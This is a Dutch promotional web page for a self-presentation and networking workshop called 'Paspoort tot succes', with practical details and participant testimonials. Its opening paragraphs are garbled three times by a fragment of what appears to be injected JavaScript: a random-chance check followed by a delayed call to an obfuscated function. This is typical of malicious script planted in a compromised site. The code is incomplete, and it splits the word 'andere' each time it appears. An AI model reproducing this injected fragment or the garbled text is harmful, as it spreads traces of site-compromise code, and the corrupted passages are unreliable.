Waar een wil is maken we een weg! Ben jij klaar om eens op een andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andere manier jezelf te presenteren? Wil jij je kans vergroten om een diepe indruk te maken bij een potentiële werkgever? En ben je toe aan een wervelende workshop waar je door de positieve energie en humor van de gastspreker zowel kan leren en lachen? Dan is dit DE workshop die je absoluut niet wil missen!

De workshop ‘ Paspoort tot succes’ wordt gegeven door gastspreker Geert Teunissen, directeur en inspirator van de NCD Academie. Geert leert ons op een andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andere manier naar het presenteren van jezelf binnen netwerken kijken.
Geert laat ons verschillende vormen van netwerken zien, maar vooral welk effect het heeft als je op een afwijkende manier contacten legt om ergens ‘binnen’ te komen. Minstens zo belangrijk als het contact leggen zijn de vervolgstappen die je onderneemt als je eenmaal bij een werkgever ‘aan tafel’ zit.

Wat gaan we doen in de workshop?
Iedere deelnemer krijgt een ‘leeg paspoort’ aangereikt. Door middel van een oefening, met behulp van andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andere deelnemers, ga je jouw specifieke en unieke punten formuleren voor in het paspoort. Dit paspoort kan je ook na de workshop nog verder aanvullen en verbeteren en gebruiken voor het leggen van contacten zodat jouw kans op succes wordt vergroot!

Zin in deze unieke, energieke en leerzame workshop, meld je dan nu aan!

Praktische info:
– Inloop om 13:00
– Start workshop 13:30
– Koffie, thee en water inbegrepen

laatste nieuws

Paspoort naar succes 15 juli 2021 in Arnhem 11 juli 2019

Waar een wil is maken we een weg! Ben jij klaar om eens op […]

lees meer
Van werkstress naar werkplezier 15 januari 2018

Woensdag 16 juni 2021 in Arnhem. De inspirerende training “Van werkstress naar werkplezier”. Wie […]

lees meer

reacties van deelnemers

Genoten van de reis die ik met jou heb mogen maken. Genoten van jouw drive en bovenal de unieke boodschap die je brengt.
Voor elke reis heb je een paspoort nodig. Bij die met jou is dat niet anders. Het was een reis die langs verschillende aandachtspunten gaat. Met name om te leren dat we meer in onze mars hebben dan we in eerste instantie denken. Het is een reis waarbij de Nederlandse nuchterheid, bescheidenheid achterwege gelaten mag worden.
We mogen, moeten volledig uit onze schulp komen! 't Wordt zo een reis die de zelfkennis vergroot. Dat is op zijn beurt de kennis die van belang is om je optimaal te kunnen presenteren bij een broodheer. Met je fysieke paspoort in de handen gevuld met persoonlijke kwaliteiten kan de reid dan ook maar een eindpunt hebben, "SUCCES". The place to-be.

Jos Brunink | Realization of Improvements

Geert is als een frisse wind, hij laat je op een ondersteboven-, achterstevoren-manier kijken naar alledaagse zaken. Kijken op een manier die je al sinds je kindertijd afgeleerd hebt, heerlijk! Hij is als trainer één brok energie en inspireert als geen ander. Ik kan iedereen aanraden bij hem een workshop te volgen.

Liesbeth ter Braak | ANT Neuro BV

Power, energie, anders denken, bevlogen. Met recht iemand die kan inspireren om het anders te doen. Niet voor niets begint zijn presentatie met: als je doet wat je altijd deed, krijg je wat je altijd kreeg. Ik kreeg energie en vooral de behoefte om het anders te doen, niet morgen, maar nu!

Janneke Knuiman | Facilitair manager
aanmelden nieuwsbrief